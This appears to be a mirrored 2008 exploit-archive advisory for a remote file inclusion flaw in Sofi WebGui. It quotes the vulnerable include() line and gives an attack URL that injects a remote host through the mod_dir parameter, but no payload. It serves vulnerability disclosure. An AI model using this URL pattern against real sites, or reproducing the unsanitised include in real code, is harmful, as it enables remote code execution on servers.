[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sofi WebGui <= 0.6.3 PRE (mod_dir) Remote File Inclusion Vulnerability
# Published : 2008-09-23
# Author : dun
# Previous Title : OpenRat <= 0.8-beta4 (tpl_dir) Remote File Inclusion Vulnerability
# Next Title : iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun dun[at]strcpy.pl ]
#########################################################################
# [ Sofi WebGui <= 0.6.3 PRE ] Remote File Inclusion Vulnerability #
#########################################################################
#
# Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu
# Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz
#
# Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???]
#
#
# Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26)
#
# ...
# if($ff=="") $ff = "index";
# $file_name = "m_$ff.php";
#
# //start web module
# include("$mod_dir/$file_name"); // RFI
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# www.Syue.com [2008-09-23]